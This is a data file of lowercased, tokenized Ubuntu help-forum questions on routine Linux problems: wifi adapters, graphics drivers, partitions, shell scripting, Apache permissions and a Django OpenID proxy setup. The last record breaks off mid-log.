319280	problems with d-link usb wifi-adapter	i am currently using a network cable to connect to my router . i have a wireless router but my desktop does n't have wireless connection ( wifi ) . so i have to use a wifi adapter . i use a usb type of adapter . but when i plug it in the led does n't come on and it appears dead . but it works in windows . so what do i have to do to make a wifi connection to my router ? update : output of lsusb command . bus 001 device 003 : id 0424:2514 standard microsystems corp. usb 2.0 hub bus 001 device 006 : id 07d1:3a09 d-link system dwa-160 802.11abgn xtreme n dual band adapter ( rev.a2 ) [ atheros ar9170+ar9104 ] bus 004 device 002 : id 046d : c517 logitech , inc. lx710 cordless desktop laser bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 008 device 001 : id 1d6b:0001 linux foundation 1.1 root hub
319281	where can i find the transmission executable	i 'm trying to download a torrent , and transmission bittorrent is n't showing up on the list of programs to run the file with , and i do n't know where to locate it .
319285	command `` xset dpms force on '' after resume	i use lubuntu 13.04 and the lvds display only works if you use the `` nomodeset '' option is set in grub . ( the vga display works without a problem ... ) after a resume i only can see on the lvds display graphic-errors , the vga display works . if i then use the command `` xset dpms force on '' in the terminal , the lvds display works . how can i do this automatically after resume ? my script did n't work . /etc/pm/sleep.d/05lcd # ! /bin/bash case `` $ 1 '' in thaw|resume ) /usr/bin/xset dpms force on 2 > /dev/null ; ; * ) ; ; esac if i type bash /etc/pm/sleep.d/05lcd thaw in the terminal the script works ... = (
319295	after creating swap partition , lts wo n't recognize new partition	i downgraded my system from 13.04 to 12.04 , and in the processes messed up cryptswap . each time i booted , i would get a warning about cryptswap not being there , so i deleted cryptswap using a tutorial i found here and added a swap partition using tutorial here now , the system recognizes that i have a swap partition , but does not load it . this is my understanding . my boot-info details are here boot info how do i get the computer to recognize the swap partition ?
319296	regex behaves differently !	when running the following echo `` abc > asf < tfg '' |sed 's/.* > \ ( . *\ ) < /\1/' the output is : asftfg i do n't understand why tfg gets printed ? my expected result is asf . though , it works fine in the following . expr `echo `` abc > asf < tfg '' ` : '.* > \ ( . *\ ) < ' which gets me : asf and help me to extract the string between > and < when input is being received from a pipe .
319298	should i remove one partition before installing ubuntu ?	i have more than one partition ( 4 ) . should i remove some before partitioning to fit ubuntu ( windows 8 ) ? i am keen to dual boot ubuntu 13.04 onto my windows 8 hp laptop . i would like to install it onto usb , then boot it up and try it then give the os its own partition . is it safe to have more than four partitions and then add a fifth ? i am not a particularly 'techy guy , so laymens terms please !
319299	ubuntu 12.04 dualboot withpre-installed win8 on acer v5 171	this is my first time working with ubuntu as i want to learn more about it , i hope anybody can help with the following : after reading online and this forum i finally got to this point that i see in grub both ubuntu with kernel 3.5.0-23-generic and the windows uefi boot loader . last action that made this work was using the boot repair . before the boot repair i only saw ubuntu in grub and had the same problem when starting this up ( purple screen only ) if i select windows in grub now this boot fine and works well . if i select ubuntu in grub this hangs on the purple screen , no other option available . only option is to restart my laptop , but than again same thing i have not yet found the solution to this issue . removing the `` quit splash '' with `` nomodeset '' did not work either . when i try to load the recovery mode it get stuck in `` switching to clocksource tsc '' has somebody any idea how to go further and get ubuntu 12.04 to work ? ?
319304	multi-monitor wallpapers on login screen ?	i am using syncwall to manage multi-monitor wallpapers on 13.04 just fine , but i was wondering if there was a way to make it work with the login screen . right now my login screen is just copying the first monitor ( the first 1/3 of the image ) and cloning it onto the separate screens .
319307	reliably check if a package is installed or not	i have a simple requirement . i want to define several variables that will correspond to any number of given packages i want to install via a shell script . sample code below : misc= '' shutter pidgin '' web= '' apache2 mongodb '' for pkg in $ misc $ web ; do if [ `` dpkg-query -w $ pkg | awk { 'print $ 1 ' } = `` '' '' ] ; then echo -e `` $ pkg is already installed '' else apt-get -qq install $ pkg echo `` successfully installed $ pkg '' fi done everything kinda works , but the logic seems flawed because it 's not reliably installing the packages i want . it either says they 've been installed already or it 's trying to install packages that have already been installed previously . i 've also been trying with command -v or the following : if [ `` dpkg -l | awk { 'print $ 2 ' } | grep -- regexp=^ $ pkg $ ! = `` '' '' ] ; then and even with the -n and -z flags to check if the returned string was empty . pretty sure i 'm missing some good sense here . do you have any idea what i could do to make sure a package is actually installed or not ? thanks !
319310	keyboard shortcuts problem	i am using ubuntu 13.04 and just loving it . i have assigned keyboard shortcut to quick shutdown . i found this method through google . i created a custom shortcut through command dbus-send -- system -- print-reply -- system -- dest=org.freedesktop.consolekit /org/freedesktop/consolekit/manager org.freedesktop.consolekit.manager.stop i have been trying to do the same to quick reboot but i ca n't find it anywhere on google . please help , thanks in advance , i have n't got much knowledge of command line .
319314	issue with upstart and rvm gem ?	im trying to get a rvm gem to run via upstart ... i ca n't seem to get it to work : siriserver.conf # siriserver start on filesystem or runlevel [ 2345 ] stop on runlevel [ ! 2345 ] respawn exec start-stop-daemon -- start -- exect /root/.siriproxy/siri.sh then my /siri.sh file is chmod ax and contains the following : # ! /bin/bash [ [ -s `` home/xbmc/.rvm/scripts/rvm '' ] ] & & . `` /home/xbmc/.vrm/scripts/rvm '' siriproxy server -d 192.168.1.100 -u xbmc my upstart log shows the following error : /usr/local/rvm/gems/ruby-2.0.0-p247/gems/siriproxy-.0.5.4/lib/siriproxy 'expand_path ' : non-absolute home thoughts ?
319320	i can not delete anything in my archive folder	when i try to delete files out of my archive folder i ca n't move them to the trash and also when i highlight them and go shift-delete that also does n't work
319321	starting xterm windows via cron	i am using cron on ubuntu server 12.04 to schedule the system to automatically reboot at midnight , and on reboot , execute a script that starts a vnc server and opens eight terminal windows and runs a command in each . i am using tightvncserver as my vnc server and xterm as my terminal emulator and openbox as my desktop environment . i am storing the cron instructions in the root 's crontab , so the script is running as root . the problem is , when i open an xterm session from ssh as root , it says the display is not set . i am using the command : 'xterm -hold -geometry 52x4+0+0 -e /pm1/start.sh ' . the vncserver is started earlier on , as root in the same script . help is greatly appreciated .
319322	ubuntu 13.04 not displaying dvd content	i am new user for ubuntu . i have updated my os from ubuntu 12.04 to ( 12.10 and now ) 13.04 . i have a dvd of movies , which works fine in windows 7 , and i am able play the movies , and can see the contents . but when i try that dvd in my ubuntu , i am getting blank `` dvd-r disk '' under device , and when i click on it , it just displays option to burn the disk , not displaying the content , i am not able to see the movies which are there in dvd . help me resolve the issue
319324	apt without root or sudo ?	i want to use apt ( or pbuilder ) to build a package in user 's home directory . the home directory has enough space to hold the package 's source , its dependencies and binary output . but the apt documents say that you have to be a root user ( sudo ) to use it . it 's frustrating , as the only way now i have at my disposal is to build the package from source or use the dpkg and in both cases , figure out dependencies manually , create the dir layout manually and install the built things manually . now if i can do all these things manually , why the tool writers ( apt ) think that doing so using their tool ( apt ) is somehow more special/dangerous ? i do n't want to use root privileges just to build and test a user-land package . if i am not allowed to do anything outside my home dir then why not the apt or pbuilder type commands be allowed to `` build '' something in my home dir without root privileges ? i just want to use their functionality . i have seen is it possible to run pbuilder without root privileges ? , but i do n't want to use uml .
319330	add www-data to alternate group	i am working with two users : me and www-data . each user has their own group by default . i want to be able to easily grant read , write , and/or execute permissions to both users , without giving the permissions to the public . my understanding of the linux file permissions system is that if i have the following file : test.php me : me 770 and the group me contains the users me and www-data , then both users would have full permissions for the file test.php . this is not working , however . i have added the user www-data to the group me and set the permissions to 770 , but apache says permissions are denied . if i change the file group to www-data so that it looks like test.php me : www-data 770 the file loads fine . the problem is that i upload the files over ftp under the user me . it 's easy to change the group , but it gets incredibly tedious if i have to ssh into the server every time i upload a new file to change the group . my understanding is that groups exist just for circumstances like these , but i do n't understand why it 's not working .
319332	problem at boot while starting lightdm	since some days i 'm having the following issue . when system try to start x to run lightdm it fails , the displayed window says that the system seems unable to recognize all the devices , after that it ask me what i want to do . the funny part in all this is that if i log in tty , kill xinit and give the command service lightdm start it works : the it loads the login screen and after that i can work fine . from the log in /var/log/xorg.failsafe.log the only error seems to be ( ee ) fbdev ( 0 ) : fbioputcmap : invalid argument the distro i 'm using is an ubuntu 12.04 my graphic card is a ati rv710 . does anyone have idea on what the problem could be ? and what does it mean the error in log above ?
319336	bind byobu window to ctrl+shift+t shortcut	ctrl+shift+t shortcut runs the gnome-terminal by default . i have installed byobu , and i want this shortcut to open the latest used byobu session . when pressed multiple times , i should still have just one window . i tried to map this shortcut to gnome-terminal , but this open multiple windows , with the same session . the behavior i want is the same as clicking on the terminal icon in the dash . after the above map i have a behavior of `` new terminal '' which can be accessed by the right click on this icon . it 's probably about some gnome-terminal parameter , but i do n't see any related one .
319337	how to select ubuntu on startup	i have ubuntu installed and everything . only problem is that i ca n't select it from startup . i have disabled secure boot , and have legacy enabled . i have windows 8 installed already on my hp envy dv7 .
319343	perl crypt : :random ?	i see an openssl : :random , but some of my code uses crypt : :random . typically i 've used cpan , but i 'm trying to avoid that . is there a crypt/random.pm somewhere that i 'm missing or should i convert my code to use something other than crypt : :random : :makerandom_octet ( ) ?
319345	what is the idea of developing mir ?	is mir is developed from the source code of wayland directly or indirectly ? how mir is developed so quickly ?
319349	how to hide a code from myself until a specified time	essentially , what i need is some way to generate and store a random string ( 20 characters long , say ) for some period of time , such that there is no way for me to recover the string until the end of that period . i am running standard ubuntu 12.10 . things that make this hard : i have root access . the computer might shut down and start up during the period . there needs to be no way for me to recover the string before the period ends . i 'll have no internet access for the duration of the period . some possible avenues of attack : run a program that generates the string and stores it in memory , waits for n seconds , then prints the string . this wo n't work because the process would be killed if the computer restarted , and i might look in the program 's memory to find the string . let the program change the root password to the randomly-generated string , removing root access from me ; let it store the string in a file that only root has r/w access to , and let root repeatedly run a program which checks whether the period is over , and if so , give me the string ( and thus root access ) . this sounds like it would work , but removing root access would be inconvenient and i 'd have to reinstall ubuntu every time something went wrong . the reason i need to do this is that i have an addiction to internet porn . most of the time i can control it , but i get cravings late at night . this is even harder because i use a computer for my work and i work from home . so lately i 've started removing /sbin/dhclient , which disables internet connectivity ( until i can get a livecd and copy the file back , but that takes a while ) . what i want to do instead is to generate a password for dhclient ( by encrypting dhclient , or just creating a zipfile with that password ) , and then only have the password given back to me the next morning . basically i 'm trying to find a commitment device , a bit like an alcoholic pouring his liquor into the sink . there might be a really easy way to do this that i 'm missing - please tell me any ideas you have . any help with this will really be appreciated !
319350	underclocking ( overclocking ) nvidia card	i have a gtx295 nvidia card which sadly wo n't run on stock clock frequencies any more , i did a brief inspection of the pcb and reapplied the tmi . it just turns itself off for some odd reason after 2-3 minutes in games , though benchmarks run perfectly fine even if overclocked . anyway i switched from windows to linux for reasons . in windows there were applications made by the card manufacturers that allowed you to adjust whatever you wanted , pretty much , in linux however this is not as simple as i had hoped . i switched to a proprietary driver , 304 i believe , followed instructions on how to do the xorg.conf with coolbits 'hack ' which unfortunately resulted in no change at all . i could n't get nvclock working too . doing research i read multiple times that they pulled overclocking ability on linux . i 'm not exactly sure whether that is true . playing games such as team fortress 2 with the nouveau driver results in a blank screen , the proprietary one works good enough , but i ca n't enjoy a game for more than 5 minutes due to the card being broken . i have n't done something like that on a linux machine ever before and i would appreciate guidance in my quest . if possible please provide a driver that would work for me and any additional instructions in case i 've being doing something wrong . oh and i 'm not exactly sure if i generated a xorg.conf file correctly , i 've been told just to make a new one and insert a few lines of text .
319351	wifi on ubuntu 13.04 for nexus 4 on sony vaio laptop with kernel driver in use iwl4965	i just recently purchased a nexus 4 phone . i already have an iphone and the same is working perfectly with my ubuntu 13.04 wifi hotspot created on sony vaio laptop . on searching a lot i found that wifi connections can be created for android only with those machines that have ath9k as kernel driver . can some one please help me connect my nexus 4 to wifi hotspot that has kernel driver iwl4965 . i would highly appreciate a quick response . thanks jacob
319353	how to open folder as a playlist in audacious from context menu	in older ubuntu versions i could right-click on a folder and i would have the option to open it with audacious . i ca n't in 13.04 . p.s . : i do n't know what thunar is .
319355	how can textfield input be validated for long integers ?	i need the user to be able to input an integer , restricted to values between 0 and an upper bound . the upper bound is too big to fit within the 'int ' data type so i have used a 'real ' data type with a doublevalidator . the doublevalidator does n't properly restrict the upper bound whereas an intvalidator with an int value works as expected . intvalidator example this restricts the entered text to integer values between 0 and 1000 : import qtquick 2.0 import ubuntu.components 0.1 mainview { id : main width : 500 height : 500 textfield { id : tf text : `` 0 '' anchors.centerin : parent validator : intvalidator { bottom : 0 top : 1000 } } property int value : 0+tf.text label { id : label text : `` '' +main.value } } doublevalidator example this restricts the entered text to integer values ( doubles with 0 decimal places ) and ensures the value is greater than or equal to 0 . however , values exceeding 1e10 are allowed - contrary to what would be expected . import qtquick 2.0 import ubuntu.components 0.1 mainview { id : main width : 500 height : 500 textfield { id : tf text : `` 0 '' anchors.centerin : parent validator : doublevalidator { bottom : 0 top : 1e10 decimals : 0 } } property real value : 0+tf.text label { id : label text : `` '' +main.value } } why does this not work as expected ? how can long integer input be validated ?
319357	ati driver installation failed	i tried to install the driver for my ati radeon hd 4330 graphics card from the amd website . i have ubuntu 13.04 on my hp laptop . after reboot i do n't have the launcher and the borders of the windows . can you please help me ?
319358	how to stop applications from changing screen	for some reason , whenever i turn my secondary monitor on , or wake my laptop from sleep , all my programs move to my secondary monitor , this can start to become quite annoying , as i usually only have 1 program on my secondary monitor so i have to drag most of my programs down onto my primary monitor every time i turn my secondary monitor on . also , any notifications , e.g . wifi connection , music changes , all appear on my secondary monitor rather than my primary one . is there any way that i can stop this from happening ?
319359	failing to initialize nvidia gpu geforce gtx 650 ti	i am unable to use nvidia drivers for my gpu , an nvida geforce 650ti since i updated to 13.04 . i was using the nouveau drivers , but it became unstable , crashing at least once per day and i need to make the nvidia drivers to work . when i try logging in , x just crash and prompt me back to the login screen . in my xorg.0.log i get : [ 46.837 ] ( ii ) `` glx '' will be loaded . this was enabled by default and also specified in the config file . [ 46.837 ] ( ii ) loadmodule : `` glx '' [ 46.837 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libglx.so [ 46.837 ] ( ii ) module glx : vendor= '' x.org foundation '' [ 46.837 ] compiled for 1.13.3 , module version = 1.0.0 [ 46.837 ] abi class : x.org server extension , version 7.0 [ 46.837 ] ( == ) aiglx enabled [ 46.837 ] loading extension glx [ 46.837 ] ( ii ) loadmodule : `` nvidia '' [ 46.837 ] ( ii ) loading /usr/lib/xorg/modules/drivers/nvidia_drv.so [ 46.837 ] ( ii ) module nvidia : vendor= '' nvidia corporation '' [ 46.837 ] compiled for 4.0.2 , module version = 1.0.0 [ 46.837 ] module class : x.org video driver [ 46.837 ] ( ii ) nvidia dlloader x driver 304.88 wed mar 27 14:28:14 pdt 2013 [ 46.837 ] ( ii ) nvidia unified driver for all supported nvidia gpus [ 46.837 ] ( ++ ) using vt number 7 [ 46.837 ] ( ii ) loading sub module `` fb '' [ 46.837 ] ( ii ) loadmodule : [ 46.837 ] ( ii ) loading /usr/lib/xorg/modules/libfb.so [ 46.837 ] ( ii ) module fb : vendor= '' x.org foundation '' [ 46.837 ] compiled for 1.13.3 , module version = 1.0.0 [ 46.837 ] abi class : x.org ansi c emulation , version 0.4 [ 46.837 ] ( ii ) loading sub module `` wfb '' [ 46.837 ] ( ii ) loadmodule : `` wfb '' [ 46.837 ] ( ii ) loading /usr/lib/xorg/modules/libwfb.so [ 46.838 ] ( ii ) module wfb : vendor= '' x.org foundation '' [ 46.838 ] compiled for 1.13.3 , module version = 1.0.0 [ 46.838 ] abi class : x.org ansi c emulation , version 0.4 [ 46.838 ] ( ii ) loading sub module `` ramdac '' [ 46.838 ] ( ii ) loadmodule : `` ramdac '' [ 46.838 ] ( ii ) module `` ramdac '' already built-in [ 46.838 ] ( == ) nvidia ( 0 ) : depth 24 , ( == ) framebuffer bpp 32 [ 46.838 ] ( == ) nvidia ( 0 ) : rgb weight 888 [ 46.838 ] ( == ) nvidia ( 0 ) : default visual is truecolor [ 46.838 ] ( == ) nvidia ( 0 ) : using gamma correction ( 1.0 , 1.0 , 1.0 ) [ 46.838 ] ( ** ) nvidia ( 0 ) : enabling 2d acceleration [ 46.838 ] ( ee ) nvidia ( 0 ) : failed to initialize the glx module ; please check in your x [ 46.838 ] ( ee ) nvidia ( 0 ) : log file that the glx module has been loaded in your x [ 46.838 ] ( ee ) nvidia ( 0 ) : server , and that the module is the nvidia glx module . if [ 46.838 ] ( ee ) nvidia ( 0 ) : you continue to encounter problems , please try [ 46.838 ] ( ee ) nvidia ( 0 ) : reinstalling the nvidia driver . i tried installing at least 5 different version of the nvidia driver ( current , 304 , 310,313,319 and 325 ) i did recreate my xorg.conf via nvidia-xconfig any help would be very appreciated . it seems my libglx.so is dating from a few months . when i remove it , i can log in , but unity is not loading . any methods to update libglx.so for my nvidia drivers ? ? are they located somewhere else ? thanks
319363	how to recover a file after deleting and merging multiple partitions ?	i 've used all my web search skills to make sure this question was n't already asked . so here is my unique situation . my 320gb hard drive had 5 partitions - let 's call them a , b , c , d and e ­٠a : windows 7 ­٠b : ubuntu 10.10 ­٠c : linux swap ­٠d : ubuntu 12.10 ­٠e : linux swap after formatting all linux partitions and installing ubuntu 12.04 , the state of my hard drive is : ­٠a : windows 7 ­٠b : ubuntu 12.04 ­٠c : linux swap ( the purpose was to simplify the hard drive and remove unnecessary oss . ) i had used tomboy notes on ubuntu 12.10 ( partition d ) . before all the formatting , i thoroughly checked all folders and backed up the necessary ones on external hard drive . since the tomboy notes folder is hidden , i forgot to back it up . now i have some very very important entries in tomboy notes . i need them badly . i 'm willing to pay a decent sum to anyone who recovers those notes . that 's how desperate i am . i 'm unable to concentrate on my studies because of this . my question : 1 . is the recovery of my tomboy notes even possible ? 2 . if yes , what is the best way to go about it ? n.b . i have decided not to use tomboy notes again . edit : 1 . when i used the `` deep search '' option in testdisk , it did detect all the old partitions - a to e. how can i exploit this ? 2 . i have stopped using my computer to avoid overwriting the existing data .
319367	openoffice did n't install correctly , how do i remove it ?	i attempted to install openoffice with the packages that the openoffice site automatically got for me which were incorrect ; rpm files insead of deb files . the problem is after attempting to install the wrong files and the going back a trying to reinstall with the right files ubuntu thinks there is already a working version of openoffice , which there is n't . i tried to remove it the way you would if it was the correct installation and working , that has n't worked . so is there any way to remove every thing related to openoffice so i can try again ?
319368	why is unity not as smooth with the proprietary nvidia driver as with open intel ?	i have a thinkpad w520 with intel hd3000 onboard graphics as well as an nvidia 1000m graphics chip , and i 'm running ubuntu 13.04 . i experience a rather big difference in how smooth unity appears with intel vs. nvidia . although games run much better with the dedicated nvidia card , unity seems to like the intel graphics better . this is especially noticeable when minimizing/maximizing windows and using the exposăš feature , as well as other effects . why is this ? you would suppose the better graphics card leads to better compiz performance , but this does not seem to be the case . i 'm not really talking about unity being slow , but instead a bit laggy , as i 'm dropping frames , with nvidia that is . it 's not a optimus problem as i 'm lucky to have a bios that allows me to choose whichever i prefer . are there any fixes or improvements that i can do to improve my unity appearance and performance with nvidia graphics ?
319369	comparing virtual memory size with resident size	i came across this stackoverflow post : http : //stackoverflow.com/questions/10400751/how-do-vmrss-and-resident-set-size-match the answer voted correctly states the following : '' so , vss should be greater than rss . if they are close to equal , that means your process is sitting comfortably in memory . if vss is much larger , that means there is n't enough memory and parts of it have to be swapped out to disk ( i.e. , because of a competing process , etc. ) . '' that statement confuses me a lot because when i inspect my system , i notice the following . first , i notice i have a lot of free memory : $ cat /proc/meminfo memtotal : 6113156 kb memfree : 3668992 kb that means i have 3.5 gigabytes of pure memory ( no swap , no disk , etc ) however , when i look at my spawned apache2 child processes , i come to a surprise : $ ps aux | grep apache2 user pid % cpu % mem vsz rss tty stat start time command root 1130 0.0 0.1 149080 10600 ? ss jul11 0:03 /usr/sbin/apache2 -k start www-data 23211 0.0 0.3 163408 23784 ? s 10:34 0:03 /usr/sbin/apache2 -k start www-data 23215 0.0 0.4 164436 24832 ? s 10:34 0:02 /usr/sbin/apache2 -k start www-data 23287 0.0 0.3 163608 23992 ? s 10:36 0:02 /usr/sbin/apache2 -k start www-data 23351 0.0 0.3 163660 24064 ? s 10:40 0:01 /usr/sbin/apache2 -k start www-data 23440 0.0 0.3 161580 23588 ? s 10:46 0:00 /usr/sbin/apache2 -k start www-data 24393 0.0 0.3 163620 23496 ? s 11:32 0:00 /usr/sbin/apache2 -k start www-data 25377 0.0 0.2 150656 12316 ? s 12:20 0:00 /usr/sbin/apache2 -k start www-data 25378 0.0 0.3 158224 18400 ? s 12:20 0:00 /usr/sbin/apache2 -k start www-data 27038 0.0 0.1 149360 7816 ? s 13:01 0:00 /usr/sbin/apache2 -k start www-data 27041 0.0 0.1 149368 7660 ? s 13:01 0:00 /usr/sbin/apache2 -k start 1000 27124 0.0 0.0 8112 900 pts/0 s+ 13:04 0:00 grep apache2 ( note that grep removes column headers , so i artificially add them back ) look how much larger virtual memory is compared to resident memory . i mean , for example , for the apache parent process ( the parent process is 1130 ) : $ ps xao pid , ppid , pgid , sid , comm | grep apache2 1130 1 1130 1130 apache2 23211 1130 1130 1130 apache2 23440 1130 1130 1130 apache2 27038 1130 1130 1130 apache2 27041 1130 1130 1130 apache2 27183 1130 1130 1130 apache2 27242 1130 1130 1130 apache2 27349 1130 1130 1130 apache2 27405 1130 1130 1130 apache2 27456 1130 1130 1130 apache2 27457 1130 1130 1130 apache2 that parent process is taking up 146 megabytes of virtual memory compared to 10 megabytes of resident memory . that is a difference of 136 megabytes of swap space being used ! so this does n't make sense to me . i have so much free memory , but it 's using so much more swap space ? ? according to the post on stackoverflow , he says `` means there is n't enough memory '' . well that 's not true . i have plenty of memory .
319370	can not build ubuntu touch project in ubuntu sdk	there is an error : the project `` name '' has no active kit so i ca n't click the run button ( it is not active ) . what should i do ?
319373	is it possible to bridge wifi to ethernet , while keeping the same `` type '' of ip ?	my current solution was to go into network settings and select that ethernet should be `` shared to other computers '' . this works in that the ethernet cord can now supply other devices with internet connectivity , but it gives them a weird ip ( 10.42.0.70 ) rather than a normal 10.0.0.xxx . this means that i ca n't ssh into the device i have plugged into my ethernet cord , which makes it essentially useless . is there any way to make it so it gives my ethernet device a 10.0.0.xxx ip ? note : i know this is hypothetically possible as when i used to run windows i was able to do this , i just have n't found how to do it on ubuntu yet .
319382	juju deployed apache+gunicorn+django app over ssl , openid fails with no mode	blog post just fyi i wrote up a blog post explaining everything i did to get up and going : http : //www.astokes.org/post/2013-07-14-juju-gunicorn-apache-django i have these services deployed and everything is accessible over https . however , when i attempt to authenticate via launchpad.net openid 2 things happen . first the callback address is http : //10.x.x.x when it should be https : //10.x.x.x and second the application fails with a openid authentication failed : invalid openid.mode '' '' when it finally does make it back to the https host . zef-sample-apache2-0 : ~ $ cat /etc/apache2/sites-enabled/10.0.3.206_https # managed by juju < virtualhost *:80 > servername 10.0.3.206 redirect permanent / https : //10.0.3.206/ < /virtualhost > < virtualhost *:443 > servername 10.0.3.206 serveradmin cts @ canonical.com customlog /var/log/cts-custom.log combined errorlog /var/log/cts-error.log sslengine on sslcertificatefile /etc/ssl/certs/ssl-cert-cts.pem sslcertificatekeyfile /etc/ssl/private/ssl-cert-cts.key requestheader set x-forwarded-ssl `` on '' requestheader set x-forwarded_proto `` https '' proxyrequests off proxypreservehost on < proxy * > order allow , deny allow from all < /proxy > proxypass / http : //10.0.3.113:8080/ proxypassreverse / http : //10.0.3.113:8080/ # rewriteengine on # rewriterule ^/ ( . * ) $ http : //10.0.3.113:8080/ $ 1 [ p , l ] # alias /favicon.ico /srv/seg-dashboard/segdash/static/favicon.ico # alias /robots.txt /srv/seg-dashboard/segdash/static/robots.txt # alias /static/admin /var/www/static/admin # alias /static/ /srv/seg-dashboard/segdash/static/ < /virtualhost > i force everything over ssl so at this point im not sure if its an application issue with my django app since running a local https server and authenticating over ssl works fine . any ideas ? here is my juju status output machines : 0 : agent-state : running dns-name : localhost instance-id : local instance-state : running services : apache2 : charm : cs : precise/apache2-11 exposed : true relations : reverseproxy : - seg-dashboard units : apache2/0 : agent-state : started machine : 0 open-ports : - 80/tcp - 443/tcp public-address : 10.0.3.206 gunicorn : charm : cs : precise/gunicorn-7 relations : wsgi-file : - seg-dashboard subordinate : true subordinate-to : - seg-dashboard postgresql : charm : cs : precise/postgresql-30 exposed : false relations : db : - seg-dashboard replication : - postgresql units : postgresql/0 : agent-state : started machine : 0 public-address : 10.0.3.37 rabbitmq-server : charm : cs : precise/rabbitmq-server-12 exposed : false relations : amqp : - seg-dashboard cluster : - rabbitmq-server units : rabbitmq-server/0 : agent-state : started machine : 0 public-address : 10.0.3.144 seg-dashboard : charm : local : precise/seg-dashboard-1 relations : amqp : - rabbitmq-server db : - postgresql website : - apache2 wsgi : - gunicorn units : seg-dashboard/0 : agent-state : started machine : 0 public-address : 10.0.3.113 subordinates : gunicorn/0 : agent-state : started and here is the relevant portion to the launchpad openid setup ( django settings.py ) secure_proxy_ssl_header = ( 'http_x_forwarded_proto ' , 'https ' ) allowed_external_openid_redirect_domains = [ 'lvh.me ' , 'localhost ' , 'canonical.com ' ] # add support for django-openid-auth authentication_backends = ( 'django_openid_auth.auth.openidbackend ' , 'django.contrib.auth.backends.modelbackend ' , ) openid_create_users = true openid_update_details_from_sreg = true openid_sso_server_url = 'https : //login.launchpad.net/' openid_use_as_admin_login = true openid_launchpad_teams_required = [ 'canonical ' , ] openid_launchpad_staff_teams = ( 'cool-guys ' , ) openid_strict_usernames = true openid_use_email_for_username = true login_url = '/openid/login/' login_redirect_url = '/' # login is required for all these patterns login_required_urls = ( r'/ ( . * ) $ ' , ) # we much except the openid urls otherwise we go in loops . login_required_urls_exceptions = ( r'/openid/ ( . * ) $ ' , ) additional : i believe the problem stems from the handoff from apache ( ssl ) to gunicorn ( nonssl ) and then when it hits launchpad.net the callback url is the apache server ( nonssl ) . i attempted to use something like django-sslify to force ssl on the application side but it seems like the proxypreservehost does not care/check if the host is coming from https or http and just defaults to http . more : here is the request headers sent to launchpad.net user-agent : mozilla/5.0 ( x11 ; ubuntu ; linux x86_64 ; rv:22.0 ) gecko/20100101 firefox/22.0 referer : https : //10.0.3.218/openid/login/ ? next=/ host : login.launchpad.net dnt:1 connection : keep-alive and here is what the form data looks like : openid_referer : '' https : //10.0.3.218/openid/login/ ? next=/ '' openid.return_to : http : //10.0.3.218/openid/complete/ ? next= % 2f & janrain_nonce=2013-07-13t03 % 3a35 % 3a28zsrfuv5 openid.realm : http : //10.0.3.218/ this is utilizing the django-openid-auth library and i am currently digging through the code to see why the consumer is directly setting the return_to http when the referer shows https ?
319384	ubuntu 13.04 mouse buttons not responding ( events do not fire correctly )	after i start ubuntu my mouse buttons don’t work in applications . when i use the left and right mouse button in the ubuntu interface they work fine . but when i try to use them inside an application ( firefox , libreoffice ) they will not respond . does anyone have a solution or any ideas on how to get my mouse to work inside of applications ? i’m running ubuntu 13.04 x64 from an usb drive . ( i have tried installing ubuntu 13.04 & 12.04 on my hard drive before while having the same problem ) i’ve had the opportunity of testing 4 different usb mice . • mad catz r.a.t 9 ( wireless ) • razor black widow ( wired ) the two other mice i’ve tested where basic logitech usb mice . edit : i just downloaded xubuntu 13.04 x64 ( i do not know how much of a driver difference it would make ) . while testing the left mouse button barely worked . only after clicked the right mouse button a number of times until the drop down menu showed up the left mouse button would respond . it made no difference whether or not i was clicking inside an application or on the default interface . edit 2 : i just did some testing using xev . i did this using one of the newer mice and one of the basic logitech ones . both did show the same problem this time and the problem occurred in both the ubuntu interface and inside applications . below i added the information xev provided on mouse click . buttonpress event , serial 41 , synthetic no , window 0x3a00001 , root 0x284 , subw 0x3a000002 , time 777837 , ( 44,33 ) , root : ( 1693,85 ) state 0x0 , button 1 , same_screen yes buttonrelease event , serial 41 , synthetic no , window 0x3a00001 , root 0x284 , subw 0x3a000002 , time 777970 , ( 44,33 ) , root : ( 1693,85 ) state 0x100 , button 1 , same_screen yes buttonpress event , serial 41 , synthetic no , window 0x3a00001 , root 0x284 , subw 0x3a000002 , time 778819 , ( 44,33 ) , root : ( 1693,85 ) state 0x0 , button 3 , same_screen yes buttonrelease event , serial 41 , synthetic no , window 0x3a00001 , root 0x284 , subw 0x3a000002 , time 778958 , ( 44,33 ) , root : ( 1693,85 ) state 0x400 , button 3 , same_screen yes edit 3 : i redid the testing i did inside a virtual machine ( which does n't show any mouse problems ) . with this i got the following results : buttonpress event , serial 41 , synthetic no , window 0x3a00001 , root 0x165 , subw 0x3a00002 , time 373889 , ( 47,51 ) , root : ( 1154,251 ) , state 0x0 , button 1 , same_screen yes enternotify event , serial 41 , synthetic no , window 0x3a00001 , root 0x165 , subw 0x0 , time 373889 , ( 47,51 ) , root : ( 1154,251 ) , mode notifygrab , detail notifyinferior , same_screen yes , focus yes , state 256 keymapnotify event , serial 41 , synthetic no , window 0x0 keys : 101 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 buttonrelease event , serial 41 , synthetic no , window 0x3a00001 , root 0x165 , subw 0x3a00002 time 374010 , ( 47,51 ) , root : ( 1154,251 ) , state 0x100 , button 1 , same_screen yes leavenotify event , serial 41 , synthetic no , window 0x3a00001 , root 0x165 , subw 0x0 , time 398758 , ( 47 , 51 ) , root : ( 1154,251 ) , mode notifyungrab , detail notifyinferior , same_screen yes , focus yes , state 0 buttonpress event , serial 41 , synthetic no , window 0x3a00001 , root 0x165 , subw 0x3a00002 , time 398757 , ( 47,51 ) , root : ( 1154,251 ) , state 0x0 , button 3 , same_screen yes enternotify event , serial 41 , synthetic no , window 0x3a00001 , root 0x165 , subw 0x0 , time 398758 , ( 47,51 ) , root : ( 1154,251 ) , mode notifygrab , detail notifyinferior , same_screen yes , focus yes , state 1024 keymapnotify event , serial 41 , synthetic no , window 0x0 keys : 101 0 0 0 0 0 0 